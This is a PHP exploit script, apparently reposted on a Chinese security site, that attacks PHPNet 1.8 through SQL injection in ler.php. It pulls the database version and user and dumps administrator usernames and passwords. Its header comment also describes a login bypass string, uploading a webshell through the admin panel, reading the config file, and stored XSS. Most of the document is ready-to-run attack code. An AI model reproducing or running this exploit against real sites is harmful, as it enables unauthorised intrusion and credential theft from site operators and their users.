<?php 标题: PHPNet <= 1.8 (ler.php) SQL Injection 作者 WhiteCollarGroup 开发者: http://www.phpnet.com.br/ 下载地址: http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos 影响版本: 1.8 测试平台: Debian GNU/Linux,Windows 7 Ultimate /* 这个系统里我们发现了多个sql注射 ~> SQL Injection This exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php. ler.php?id=[SQLi] imprimir.php?id=[SQLi] imagem.php?id=[SQLi] 示例 php file.php http:// www.2cto.com /path/ ~> Login bypass In login page, you can bypass the login using "SQLi strings". Go to http:// www.2cto.com /path/admin/login.php Login: ' or 1=1-- wc Pass: wcgroup ~> 任意文件上传 After open administration panel, try to add a new article. Use the upload form to upload your webshell. After posting, access: http://server/path/tmp/your_shell_filename.php ~> 信息泄露 Access: http://server/path/conf/config.ini ~> XSS Stored (persistent) When posting a new article, you can post (D)HTML/Javascript codes on the page. */ function _printf($str) { echo $str."\n"; } function hex($string){ $hex=''; // PHP 'Dim' =] for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return '0x'.$hex; } set_time_limit(0); error_reporting(E_ERROR & E_USER_WARNING); @ini_set('default_socket_timeout', 30); echo "\n"; echo "PHPNet <= 1.8 SQLi Exploit\n"; echo "Discovered by WhiteCollarGroup\n"; echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com"; if($argc!=2) { _printf("Usage:"); _printf("php $argv[0] <target>"); _printf("Example:"); _printf("php $argv[0] http:// www.2cto.com /path/"); exit; } $target = $argv[1]; if(substr($target, (strlen($target)-1))!="/") { // se o ultimo caractere nao for uma barra $target .= "/"; } $inject = $target . "ler.php?id=-0'%20"; $token = uniqid(); $token_hex = hex($token); // vamos agora obter os seguintes da dos : user() version() echo "\n\n[*] Trying to get informations...\n"; $infos = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",version(),".$token_hex.",user(),".$token_hex."),6,7,8-- ")); $infos_r = array(); preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r); $user = $infos_r[1][0]; $version = $infos_r[2][0]; if(($user) AND ($version)) { echo "[!] MySQL user: $user\n"; echo "[!] MySQL version: $version\n"; } else { echo "[-] Error while getting informations...\n"; } $i = 0; while(1==1) { $dados_r = array(); $dados = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",admin_user,".$token_hex.",admin_pass,".$token_hex."),6,7,8 from pna_admin limit $i,1-- ")); preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r); $login = $dados_r[1][0]; $senha = $dados_r[2][0]; if(($login) AND ($senha)) { echo " -+-\n"; echo "[!] User: $login\n"; echo "[!] Pass: $senha\n"; $i++; } else { break; // exitloop } if($i==0) { echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry."; } else { echo " -+-\n[!] :D"; } echo "\n"; } ?>
查看更多关于PHPNet <= 1.8 (ler.php) SQL注射及修复 - 网站安全的详细内容...